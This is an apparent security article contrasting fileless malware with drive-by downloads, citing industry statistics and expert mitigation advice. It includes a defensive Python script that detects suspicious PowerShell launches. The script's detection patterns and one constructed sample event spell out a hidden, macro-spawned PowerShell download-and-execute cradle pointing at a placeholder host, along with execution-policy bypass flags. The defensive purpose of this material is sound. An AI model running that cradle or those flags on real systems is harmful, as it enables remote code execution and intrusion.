When WatchGuard Threat Labs published its 2019 security predictions as 2018 was coming to an end, one entry leapt from the page: the emergence of vaporworms. It turns out that what was being described was a self-propagating form of fileless malware. While malware running entirely in memory, without installing a file onto the impacted system, is not a new threat, it most certainly is a growing one.
Indeed, whereas it was once assumed that the savvy business could avoid becoming the victim of a computer virus just by the avoidance of downloading dodgy files from untrusted sources, that hasn’t been the case more recently. The modern threat landscape is littered with fileless malware and drive-by download attacks that can do their damage with little or no action needed on the part of the user. So, what are the differences between these two attack methodologies, and what can the enterprise do to mitigate against them?
What’s the Difference?
Let’s start with how drive-by downloads and fileless malware differ, which should be obvious by virtue of the threat names themselves. A drive-by download requires the delivery, installation and execution of malware onto the victim’s system, whereas fileless malware exists only in the memory of the system rather than needing that initial physical presence on disk. Both attack methodologies tend to rely on stealth in order to succeed. However, as Steven Furnell, senior IEEE member and professor of information security at the University of Plymouth, points out, the differences are a little more conceptual than that, and a certain amount of crossover exists between the two threats.
“Fileless malware is a mode of operation, by contrast, a drive-by download is a mode of infection,” he explains, adding “the dropping of fileless malware onto a system could occur as an outcome of a drive-by download, of course.”
When the Ponemon Institute looked back at the 2017 endpoint security risk landscape it found that 54% of companies experienced at least one successful attack on their data or infrastructure and, tellingly, in 77% of those attacks, fileless malware was exploited. Indeed, the same report suggests that fileless attacks are more likely (by a factor of 10) to succeed than file-based attacks.
Remember that Russian bank heist back in July 2018? The MoneyTaker hacking group used custom fileless malware to help pull that, and a bunch of other attacks, off. It is thought they were able to net more than $14m in total. It comes as no surprise, then, that the rise of fileless malware has continued. According to the SentinelOne H1 2018 Enterprise Risk Index Report, the use of fileless malware attacks rose by 94% in the first six months of the year. PowerShell attacks alone grew from 2.5 per 1000 endpoints in May to 5.2 by June 2018. All fileless malware attacks equated to 42 out of every 1000 endpoint attacks halfway through the year.
As far as drive-by downloads are concerned, the overall picture looks just as gloomy. The 2017 Cylance Threat Report concluded that more than half of the attacks during 2017 exploited vulnerabilities that had been known about at least nine months or more prior to the exploit. What’s more, along with ever-present phishing threats, drive-by downloads remained the most common of infection vectors. In 2018, Infosecurity reported how a traffic distribution system called BlackTDS had emerged as an ‘As-a-Service’ drive-by download kit. So, these old threat vectors are not only still around, but appear to be on the rise. Why is that?
Drive-By Drops?
First of all, it would not be a surprise if the number of drive-by attacks either levels out or starts falling once organizations respond to the 2018 full year threat landscape reports. That is because, as the browser security improvement curve slowly rises, the effectiveness of drive-by exploit kits will start tapering off. So, while in the summer of 2018, a report from Bromium suggested that ‘download attacks’ in general were being used slightly more than attachment-based malware, it could likely prove to be a blip. There will inevitably always be opportunities for modifying site code through cross-site scripting (XSS), iFrames or JavaScript, for example, but increased developer security awareness means these opportunities are fewer year on year.
Certainly, as far as the broader drive-by exploit vector is concerned, if target sites cannot be modified easily enough through browser exploits to make the effort involved a profitable one, the bad guys will surely look for easier avenues of criminality. That suggests there will be even more success for the fileless malware option, especially when used as part of an overall attack campaign.
“It’s increasingly being used during the early stages of an intrusion,” says Michael Yip, security principal at iDefense. “That’s because threat actors are careful about selecting their victims before planting more sophisticated malware.” Why is this? It provides them with the luxury of time to collect as much data about the victim as possible without the fear of detection.
That’s the real kicker when it comes to why fileless malware in particular is not only on the up, but will continue to rise for the foreseeable future: by abusing scripting tools that already exist on the network (such as Windows PowerShell), without resorting to file-level modifications, it can sail right past many of the anti-malware protections in place in the enterprise, pretty much in plain sight.
Fileless malware is, in effect, a zero-footprint threat. If you cannot see it, you cannot easily defend against it. The enterprise simply cannot just block the files that are exploited by fileless malware. Imagine the impact on IT support and systems if PowerShell were blacklisted, not that it would do much good anyway. After all, threat actors are perfectly capable of Googling how to bypass your PowerShell execution policy. So, what should the enterprise be doing to mitigate the undeniable cyber-risk that both fileless and, to a lesser extent, drive-by attack methodologies pose?
Mitigating the Risk
Let’s look at the risk that is easier to mitigate first, namely drive-by downloads. As this kind of attack methodology relies entirely on there being vulnerable software, from plugin to application, the best starting point is a somewhat obvious one. Cesar Cerrudo, CTO at security research firm IOActive, advises using multiple layers of protection. “Browsers, plugins and all web technology should be up-to-date with security patches,” Cerrudo says, adding “the same for all the software and operating systems.”
Patch management should be at the top of the enterprise security list anyway, but if that were a reality, these kinds of attacks would have long since petered out. Ensuring user accounts are not over-privileged helps reduce the impact of any lateral movement via privilege escalation that the malware may attempt once executed. Behavioral monitoring solutions offer some protection once the downloaded file executes on the endpoint, looking for such things as arbitrary code injection into other processes.
As for fileless malware attack mitigation, things are rather less straightforward. Assuming that disabling the routes through which the malware issues commands (PowerShell, Windows Management Instrumentation, Word macros etc.) has been explored and rejected because of the disruption to workflow it would cause, then behavioral attributes are a good starting point. “Detection of the malware relies upon monitoring the system and spotting the things it is trying to do,” Professor Furnell advises. “This in turn relies upon real-time protection solutions.” Unfortunately, the real-time bit is usually the main problem: fileless malware needs only seconds to execute and propagate through a network, and as it leaves no evidence trail on disk to follow, it can cause immense damage before it is spotted and stopped.
“As the malware only exists in memory, scanning that memory is the only way to detect its presence,” Yip explains. That is problematic, as most fileless exploits will obfuscate their presence using string encoding, for example. However, Yip is correct insofar as you have to spot fileless malware in the act, doing its work in memory, in order to catch it. This means a change in thinking and an acknowledgement from the enterprise security team that the indicators of compromise will be different from those of file-based attacks.
The endpoint patching advice offered earlier still stands. In addition, advanced monitoring solutions that employ some degree of machine learning to spot suspicious behavior in memory, and that can isolate the threat efficiently (and without human intervention), should also be considered.
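The monitoring advice above is usually put into practice as behavioral rules over endpoint telemetry rather than file signatures, and the string encoding Yip mentions is the first thing such a rule has to undo. The following Python script is an added example, not code from the article or from any of the vendors it quotes. It assumes process-creation events (for instance Sysmon Event ID 1 or Windows 4688 with command-line auditing enabled) have already been reduced to dictionaries with an id, parent image, image and command line; the event records, the indicator names, the point values and the threshold are all constructed for the example. It unwraps PowerShell's `-EncodedCommand` argument (base64 over UTF-16LE), scores the launch on its parent process (Office, WMI and script hosts spawning a shell, which covers the macro and WMI routes named earlier) and on the behaviours visible in the decoded text, and flags anything above a threshold so that a benign encoded command is not treated the same as a hidden-window downloader.

```python
"""Score PowerShell process-creation events for fileless-malware tradecraft.

Added example, not the article's or any vendor's code. Assumes process-creation
telemetry already exists and has been reduced to dicts with id, parent, image
and cmdline. All sample events below are constructed, not captured.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List


def to_encoded_command(script: str) -> str:
    """Produce the base64 form PowerShell's -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Simplified matcher: PowerShell accepts further prefixes of -EncodedCommand too.
ENCODED_FLAG = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Parents that normally have no business launching a shell (macro, WMI, script hosts).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wmiprvse.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Behavioural indicators, one point each; the labels are this example's own.
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "web-download": re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)-nop\b|-noprofile"),
    "policy-bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
    "reflective-load": re.compile(r"(?i)reflection\.assembly"),
}

FLAG_THRESHOLD = 3  # constructed threshold; tune against your own baseline


@dataclass
class Finding:
    event_id: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: str = ""

    @property
    def flagged(self) -> bool:
        return self.score >= FLAG_THRESHOLD


def analyze_event(event: dict) -> Finding:
    """Score one process-creation record; only PowerShell launches are scored."""
    finding = Finding(event_id=event["id"])
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return finding
    cmdline = event["cmdline"]

    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        finding.score += 2
        finding.reasons.append(f"parent:{parent}")

    # Unwrap -EncodedCommand so string encoding cannot hide the script from the rules.
    text = cmdline
    match = ENCODED_FLAG.search(cmdline)
    if match:
        finding.score += 1
        finding.reasons.append("encoded-command")
        try:
            finding.decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            finding.score += 1
            finding.reasons.append("undecodable-encoded-command")
        # Match rules against the plain flags plus the decoded script, not the blob.
        text = ENCODED_FLAG.sub(" ", cmdline) + " " + finding.decoded

    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            finding.score += 1
            finding.reasons.append(name)
    return finding


def scan(events) -> List[Finding]:
    """Score every event; callers filter on Finding.flagged."""
    return [analyze_event(e) for e in events]


# Constructed sample telemetry: one benign launch, one macro-spawned encoded
# downloader (example.invalid is a reserved, non-resolving domain), one benign
# encoded command, and one WMI-spawned shell with profile and policy flags.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"id": "evt-2", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": PS,
     "cmdline": "powershell.exe -nop -w hidden -enc " + to_encoded_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"id": "evt-3", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -ec " + to_encoded_command(
         "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5")},
    {"id": "evt-4", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": PS,
     "cmdline": 'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Get-Service -Name Spooler"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{'FLAG' if f.flagged else 'ok  '} {f.event_id} score={f.score} {','.join(f.reasons)}")
```

Running the script flags evt-2 and evt-4 and leaves evt-1 and evt-3 alone: the encoded-but-benign evt-3 scores a single point, which is the reason for scoring rather than alerting on every encoded command. The parent-process weighting is what turns the Word macro and WMI cases from "PowerShell ran" into something worth a response, and the decoded text is kept on the finding so an analyst can read what would have executed without re-decoding it.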
At the risk of sounding like an Arnold Schwarzenegger movie trailer, seek and destroy AI bots are likely going to be the way forward as fileless malware continues to take a grip on the threat landscape.